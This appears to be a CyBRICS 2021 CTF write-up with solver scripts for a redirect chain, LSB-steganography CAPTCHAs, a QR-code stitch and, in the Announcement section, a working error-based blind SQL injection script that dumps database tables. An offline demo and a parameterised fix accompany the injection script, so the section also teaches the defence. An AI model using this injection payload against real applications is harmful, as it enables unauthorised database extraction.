web

Ad NetWork

Nested redirects

A ridiculously annoying chain of nested redirects. Just write a script and let it run on its own; curl is the comfortable way to do it.

<?php
$url = "http://dream.adnetwork-cybrics2021.ctf.su/bit-wait-admit-artist-deal/might-inside-toward-suddenly-watch/rich-outside-arrive/character-possible-easy";

while (1) {
    echo $url . "\n";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT_MS, 3000);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    if ($output === false) {
        // Retry the same hop on a timeout; stop on any other transport error
        if (curl_errno($ch) == CURLE_OPERATION_TIMEDOUT) {
            curl_close($ch);
            continue;
        }
        echo "curl error: " . curl_error($ch) . "\n";
        curl_close($ch);
        break;
    }
    echo $output;
    curl_close($ch);
    // The next hop is the first double-quoted string in the response body;
    // when there is none, this is the last page and the flag is in $output
    $parts = explode('"', $output);
    if (count($parts) < 2) {
        break;
    }
    $url = $parts[1];
}

Once it has chewed through 1337 hops, the flag comes out.

cybrics{f0lL0w_RUl3Z_F0ll0W_r3d1r3C7z}
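As an added example (not the PHP above and not anything from the challenge), here is the same chase in Python, generalised to the three ways a page can bounce you onward: a 3xx Location header, a meta refresh, and a JavaScript location assignment, with the "first quoted absolute URL in the body" heuristic from the PHP kept as a last resort. It also adds the two checks a practitioner wants when following an arbitrary server's redirects: a hop limit/loop detector and a host allowlist so the chain cannot steer the client off-site. `fake_fetch` is a constructed stand-in for the server with 1337 hops (the count from the writeup) in rotating styles; the regexes are heuristics, not a spec.

```python
import re
import urllib.request
import urllib.error
from html import unescape
from urllib.parse import urljoin, urlsplit

# Heuristic patterns for in-body redirects (assumptions, not a full HTML/JS parser)
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]+content=["\']\s*\d+\s*;\s*url=([^"\'>]+)', re.I)
JS_LOCATION = re.compile(r'(?:window\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
QUOTED_URL = re.compile(r'"(https?://[^"]+)"')  # the PHP's explode('"', ...)[1] idea


def next_hop(status, headers, body, base):
    """Return the URL this response points to next, or None if it is the final page."""
    location = {k.lower(): v for k, v in headers.items()}.get("location")
    if 300 <= status < 400 and location:          # a real HTTP redirect wins
        return urljoin(base, location)
    for pattern in (META_REFRESH, JS_LOCATION, QUOTED_URL):
        m = pattern.search(body)
        if m:
            return urljoin(base, unescape(m.group(1)))
    return None


def follow(fetch, start, max_hops=2000, allowed_host=None):
    """Walk the chain. fetch(url) -> (status, headers, body).
    Returns (final_url, final_body, hops_taken); raises on loops, hop limit or off-host hops."""
    url, seen = start, set()
    for hops in range(max_hops + 1):
        if allowed_host is not None and urlsplit(url).hostname != allowed_host:
            raise RuntimeError(f"refusing to leave {allowed_host}: {url}")
        if url in seen:
            raise RuntimeError(f"redirect loop at {url}")
        seen.add(url)
        status, headers, body = fetch(url)
        nxt = next_hop(status, headers, body, url)
        if nxt is None:
            return url, body, hops
        url = nxt
    raise RuntimeError(f"gave up after {max_hops} hops")


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib hand the 3xx back to us instead of following it
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, timeout=3):
    """Real fetcher for follow(): one request, redirects not auto-followed."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(url, timeout=timeout)
    except urllib.error.HTTPError as e:   # 3xx/4xx/5xx still carry headers and a body
        resp = e
    return resp.getcode(), dict(resp.headers), resp.read().decode("utf-8", "replace")


def fake_fetch(url):
    """Constructed stand-in for the challenge server: 1337 hops, style rotating per hop."""
    n = int(url.rsplit("/", 1)[1])
    if n >= 1337:
        return 200, {}, "<p>done: flag{constructed_example}</p>"
    nxt = f"/hop/{n + 1}"
    if n % 3 == 0:
        return 302, {"Location": nxt}, ""
    if n % 3 == 1:
        return 200, {}, f'<meta http-equiv="refresh" content="0; url={nxt}">'
    return 200, {}, f'<script>window.location.href = "{nxt}";</script>'


if __name__ == "__main__":
    final_url, body, hops = follow(fake_fetch, "http://example.test/hop/0", allowed_host="example.test")
    print(hops, final_url, body)
```

Against the real target you would call `follow(http_fetch, start_url, allowed_host="dream.adnetwork-cybrics2021.ctf.su")`; the allowlist is what keeps an untrusted chain from turning the script into a generic request proxy.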

Announcement

Simple SQL injection

Almost nothing is filtered, but note that the form also sends an MD5 digest of the payload, so the script has to compute it; with that in place, just blind-inject with a script.

import requests
from hashlib import md5

url = "http://announcement-cybrics2021.ctf.su/"
# Queries used one after another to map the schema, with what each returned:
# sql = "select database()" # announcement
# sql = "select group_concat(table_name) from information_schema.tables where table_schema = database()" # emails,logs
# sql = "select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'emails'" # email,id,timestamp
# sql = "select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'logs'" # log
sql = "select * from logs" # flag cybrics{1N53r7_0ld_900d_5ql}
result = ""

for i in range(1, 100):
    # Binary search over printable ASCII for character i of the query result
    left = 32
    right = 128
    while left < right:
        mid = int((left + right - 1) / 2)
        # Error-based oracle: if the character is > mid the IF() yields 1 and the INSERT
        # succeeds; otherwise cot(0) raises a MySQL error whose message contains "cot".
        # The trailing ", NOW()) #" completes the INSERT's VALUES list and comments out the rest.
        payload = f"' or if((ascii(substr(({sql}),{i},1))>{mid}),1,cot(0)), NOW()) #"
        data = {
            # The digest is just md5(email) computed client-side, so it is no obstacle
            "digest": md5(payload.encode('utf-8')).hexdigest(),
            "email": payload
        }
        res = requests.post(url=url, data=data)
        if "cot" in res.text:
            right = mid
        else:
            left = mid + 1
        # print(f"[*]New left is: {left} and right is: {right}")
    result += chr(int((left + right) / 2))
    print(f"[+]Result new is: {result}")

This dumps the flag.

cybrics{1N53r7_0ld_900d_5ql}
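As an added example (not the challenge's code, which we never saw), here is the whole thing offline: a constructed SQLite stand-in for the endpoint, built the way the payload implies (the trailing `, NOW()) #` only makes sense if the email is concatenated into `INSERT INTO emails (email, timestamp) VALUES ('...', NOW())` and database errors are echoed back), the same error-based binary search run against it, and the parameterised version of the same endpoint to show that the MD5 digest was never the protection. SQLite has no `if()`/`cot()`, so `CASE` and `abs(-2^63)` (which raises "integer overflow") stand in for them; the table contents are made up.

```python
import sqlite3
from hashlib import md5


def build_db():
    """Constructed stand-in for the challenge database (in-memory SQLite, not the real MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE emails (id INTEGER PRIMARY KEY, email TEXT, timestamp TEXT);
        CREATE TABLE logs (log TEXT);
        INSERT INTO logs VALUES ('cybrics{constructed_example}');
    """)
    return db


def vulnerable_insert(db, email, digest):
    """Assumed endpoint: check digest == md5(email), then build the INSERT by string
    concatenation and echo any database error back to the client."""
    if md5(email.encode()).hexdigest() != digest:
        return "bad digest"
    sql = f"INSERT INTO emails (email, timestamp) VALUES ('{email}', datetime('now'))"
    try:
        db.execute(sql)
        return "ok"
    except sqlite3.Error as e:
        return f"error: {e}"        # this leak is the oracle


def safe_insert(db, email, digest):
    """Same endpoint with a bound parameter: the payload becomes an ordinary email value."""
    if md5(email.encode()).hexdigest() != digest:
        return "bad digest"
    db.execute("INSERT INTO emails (email, timestamp) VALUES (?, datetime('now'))", (email,))
    return "ok"


def stored_emails(db):
    return [row[0] for row in db.execute("SELECT email FROM emails")]


def make_oracle(db, endpoint, query):
    """Error-based oracle: True iff character i of the query result has code > mid.
    unicode()/CASE/abs(-2**63) replace MySQL's ascii()/if()/cot(0)."""
    def oracle(i, mid):
        payload = (f"' OR (CASE WHEN unicode(substr(({query}),{i},1)) > {mid} THEN 1 "
                   f"ELSE abs(-9223372036854775807 - 1) END), datetime('now')) --")
        reply = endpoint(db, payload, md5(payload.encode()).hexdigest())
        return "overflow" not in reply
    return oracle


def blind_extract(oracle, max_len=100):
    """Binary search each character over 0..127; unicode('') is NULL past the end of the
    string, so every comparison fails there and the search bottoms out at 0, which ends it."""
    out = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(i, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print(blind_extract(make_oracle(db, vulnerable_insert, "SELECT log FROM logs")))
    # Against the parameterised endpoint the oracle never errors, so nothing leaks
    print(repr(blind_extract(make_oracle(build_db(), safe_insert, "SELECT log FROM logs"), max_len=5)))
```

The digest check passes in both versions because the client computes it; what stops the extraction is the bound parameter, which turns the payload into a row in `emails` instead of a second expression in the `VALUES` list.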

misc

CAPTCHA The Flag

Every image has had its LSB modified; open it in Stegsolve and the CAPTCHA is visible, then type them in one by one. (There must be a more convenient approach; I just brute-forced it by hand.)

After the contest, 卓哥 shared an interactive Python script that splits an image into its colour bit planes, which is really neat. I feel there is still a lot of misc knowledge I don't really understand (still need to improve).

import httpx as requests
import numpy as np
from PIL import Image

# bit planes codes are from https://medium.com/@stephanie.werli/image-steganography-with-python-83381475da57
# Interactive Script

# Routes traffic through a local proxy on 127.0.0.1:7890; drop the proxies argument if you don't need one
session = requests.Client(proxies={
    "http://": "http://127.0.0.1:7890",
    "https://": "http://127.0.0.1:7890",
})
while True:
    # Fetch a fresh CAPTCHA image and save it to disk
    image = session.get("https://captf-cybrics2021.ctf.su/captcha.php").content
    with open("./tmp.png", "wb") as file:
        file.write(image)

    # Split the image into its 8 bit planes (MSB first) and show them side by side;
    # the CAPTCHA text sits in the least significant plane
    data = np.array(Image.open("./tmp.png", "r"))
    out = []
    for k in range(7, -1, -1):
        res = data // 2 ** k & 1
        out.append((res * 255).astype(np.uint8))
    b = np.hstack(out)
    Image.fromarray(b).show()

    captcha = input("Enter the captcha you have seen in the window:")
    try:
        response = session.post("https://captf-cybrics2021.ctf.su/", data={"answer": f"{captcha}"})
    except Exception:
        print("[*] Submission failed.")
        continue
    print(f"[+] Submitted {captcha} with response {response.content.decode()}")
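As an added example (my own, not 卓哥's script and not anything from the challenge), the bit-plane split done in plain Python on a constructed 8x5 greyscale image, so you can see why text written into the LSB is invisible in the picture yet jumps out in plane 0 and leaves the high planes untouched. The cover gradient, the glyph and the PGM writer are all constructed for the demo; `planes_strip` lays the eight planes side by side, MSB first, exactly like the `np.hstack` in the script above.

```python
WIDTH, HEIGHT = 8, 5

# Constructed 8x5 "CAPTCHA" glyph (a letter T); 1 = ink. Not the challenge's data.
SECRET = [
    1, 1, 1, 1, 1, 1, 1, 1,
    0, 0, 0, 1, 1, 0, 0, 0,
    0, 0, 0, 1, 1, 0, 0, 0,
    0, 0, 0, 1, 1, 0, 0, 0,
    0, 0, 0, 1, 1, 0, 0, 0,
]
# Constructed cover: a smooth horizontal gradient in 8-bit grey, row-major
COVER = [(x * 255) // (WIDTH - 1) for y in range(HEIGHT) for x in range(WIDTH)]


def embed_lsb(cover, secret):
    """Overwrite bit 0 of every pixel with one secret bit (changes each pixel by at most 1)."""
    return [(c & 0xFE) | (s & 1) for c, s in zip(cover, secret)]


def bit_plane(pixels, k):
    """Plane k as a 0/255 image; the same thing as `data // 2**k & 1` scaled by 255."""
    return [((p >> k) & 1) * 255 for p in pixels]


def planes_strip(pixels, width, height):
    """All eight planes side by side, MSB first: `height` rows of 8*width pixels."""
    planes = [bit_plane(pixels, k) for k in range(7, -1, -1)]
    rows = []
    for y in range(height):
        row = []
        for plane in planes:
            row.extend(plane[y * width:(y + 1) * width])
        rows.append(row)
    return rows


def encode_pgm(width, height, pixels):
    """Binary PGM (P5) so the planes can be opened in any image viewer."""
    return f"P5 {width} {height} 255\n".encode() + bytes(pixels)


def write_pgm(path, width, height, pixels):
    with open(path, "wb") as f:
        f.write(encode_pgm(width, height, pixels))


if __name__ == "__main__":
    stego = embed_lsb(COVER, SECRET)
    strip = planes_strip(stego, WIDTH, HEIGHT)
    for row in strip:
        print("".join("#" if p else "." for p in row))   # last 8 columns = plane 0 = the glyph
    write_pgm("planes.pgm", WIDTH * 8, HEIGHT, [p for row in strip for p in row])
```

Printing the strip shows the planes from bit 7 on the left to bit 0 on the right: the left-hand planes are still the gradient, and the glyph only appears in the right-most block, which is what Stegsolve's LSB view shows on the real images.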

Scanner

A QR-code stitching challenge.

Just write a script to reassemble it.

from PIL import Image

nl = 0
# Canvas for the stitched slices
newImage = Image.new("RGB", (989, 162), "white")

# Every third frame of the extracted GIF carries the next slice of the code
for i in range(8, 145, 3):
    print("[+]New is: ./gif/IMG00%03d.bmp" % i)
    image = Image.open('./gif/IMG00%03d.bmp' % i)
    # Crop the 6-pixel-high band holding this frame's slice and stack it under the previous ones
    splice = image.crop((46, 496, 1036, 502))
    newImage.paste(splice, (0, nl))
    nl += 6

# Square it up so a QR reader can decode it
newImage = newImage.resize((500, 500))
newImage.save("flag.png")

The resulting image is a QR code; scan it to get the flag.

cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}